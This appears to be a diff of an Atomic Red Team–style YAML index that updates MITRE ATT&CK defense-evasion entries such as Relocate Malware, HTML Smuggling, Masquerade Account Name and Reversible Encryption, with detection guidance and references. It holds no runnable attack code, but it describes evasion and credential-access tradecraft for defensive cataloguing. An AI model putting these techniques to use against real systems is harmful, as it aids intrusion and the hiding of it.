+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1070.010:
+    technique:
+      modified: '2024-10-13T15:48:46.391Z'
+      name: Relocate Malware
+      description: |-
+        Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+        Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+        Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Matt Anderson, @‌nosecurething, Huntress
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+      created: '2024-05-31T11:07:57.406Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/010
+        external_id: T1070.010
+      - source_name: Latrodectus APR 2024
+        description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+          (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+          31, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+      - source_name: DFIR Report Trickbot June 2023
+        description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+          Retrieved May 31, 2024.
+        url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -27275,10 +27531,9 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -27315,40 +27570,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.002:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
-      type: attack-pattern
-      created: '2020-05-14T14:45:15.978Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.002
-        url: https://attack.mitre.org/techniques/T1578/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.416Z'
       name: Create Cloud Instance
       description: |-
         An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -27357,20 +27582,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the creation of an instance in the <code>RunInstances</code> event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances create</code> to create a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Creation'
       - 'Instance: Instance Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+      created: '2020-05-14T14:45:15.978Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/002
+        external_id: T1578.002
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.009:
     technique:
@@ -27400,7 +27655,7 @@ defense-evasion:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -27443,8 +27698,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1601.001:
     technique:
@@ -27491,7 +27744,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:46.560Z'
       name: Patch System Image
       description: "Adversaries may modify the operating system of a network device
         to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -27557,12 +27810,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T22:30:01.227Z'
       name: Clear Persistence
       description: |-
         Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -27617,33 +27868,84 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
-  T1556.001:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1036.010:
+    technique:
+      modified: '2024-10-17T15:20:36.705Z'
+      name: Masquerade Account Name
+      description: "Adversaries may match or approximate the names of legitimate accounts
+        to make newly created ones appear benign. This will typically occur during
+        [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+        may also be renamed at a later date. This may also coincide with [Account
+        Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+        deletes an account before re-creating one with the same name.(Citation: Huntress
+        MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+        such as those associated with legitimate software, data backups, or container
+        cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+        Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+        such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+        2024) Sometimes adversaries may model account names off of those already existing
+        in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+        \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+        which describes impersonating specific trusted individuals or organizations,
+        rather than user or service account names.  "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Menachem Goldstein
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - SaaS
+      - IaaS
+      - Containers
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Creation'
       type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
+      id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+      created: '2024-08-05T21:39:16.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1036/010
+        external_id: T1036.010
+      - source_name: Elastic CUBA Ransomware 2022
+        description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+          Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+          August 5, 2024.
+        url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+      - source_name: Invictus IR Cloud Ransomware 2024
+        description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+          August 5, 2024.
+        url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+      - source_name: Huntress MOVEit 2023
+        description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+          CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+        url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+      - source_name: Aquasec Kubernetes Attack 2023
+        description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+          Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+          2023.
+        url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.001:
+    technique:
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -27664,6 +27966,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -27678,22 +27981,42 @@ defense-evasion:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.006:
     technique:
-      modified: '2023-07-14T14:01:41.475Z'
+      modified: '2024-09-12T19:12:13.006Z'
       name: HTML Smuggling
       description: |-
         Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -27751,13 +28074,12 @@ defense-evasion:
         url: https://www.menlosecurity.com/blog/new-attack-alert-duri
       - source_name: nccgroup Smuggling HTA 2017
         description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
-          Explorer/Edge. Retrieved May 20, 2021.
-        url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+          Explorer/Edge. Retrieved September 12, 2024.
+        url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.006
     atomic_tests:
     - name: HTML Smuggling Remote Payload
@@ -27788,37 +28110,7 @@ defense-evasion:
         elevation_required: false
   T1556.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
-      type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -27840,6 +28132,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -27850,23 +28143,50 @@ defense-evasion:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:43:18.873Z'
       name: Command Obfuscation
       description: |-
         Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -27907,8 +28227,9 @@ defense-evasion:
         url: https://attack.mitre.org/techniques/T1027/010
         external_id: T1027.010
       - source_name: Twitter Richard WMIC
-        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
-        url: https://twitter.com/rfackroyd/status/1639136000755765254
+        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+          2024.
+        url: https://x.com/rfackroyd/status/1639136000755765254
       - source_name: Invoke-Obfuscation
         description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
           March 17, 2023.
@@ -27944,43 +28265,23 @@ defense-evasion:
         url: https://redcanary.com/threat-detection-report/techniques/powershell/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1070.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Walker Johnson
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
-      created: '2020-01-31T12:35:36.479Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.004
-        url: https://attack.mitre.org/techniques/T1070/004
-      - source_name: Microsoft SDelete July 2016
-        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
-          8, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:33:59.107Z'
+      name: 'Indicator Removal on Host: File Deletion'
       description: |-
         Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 
         There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Indicator Removal on Host: File Deletion'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Walker Johnson
+      x_mitre_deprecated: false
       x_mitre_detection: It may be uncommon for events related to benign command-line
         functions such as DEL or third-party utilities or tools to be found in an
         environment, depending on the user base and how systems are typically used.
@@ -27991,18 +28292,36 @@ defense-evasion:
         network that an adversary could introduce. Some monitoring tools may collect
         command-line arguments, but may not capture DEL commands since DEL is a native
         function within cmd.exe.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Deletion'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+      created: '2020-01-31T12:35:36.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/004
+        external_id: T1070.004
+      - source_name: Microsoft SDelete July 2016
+        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+          8, 2018.
+        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.004
     atomic_tests:
     - name: Delete a single file - FreeBSD/Linux/macOS
@@ -28346,7 +28665,7 @@ defense-evasion:
         description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
           2018.
         source_name: ryhanson phishery SEPT 2016
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-12T18:16:56.176Z'
       name: Template Injection
       description: |-
         Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -28376,8 +28695,6 @@ defense-evasion:
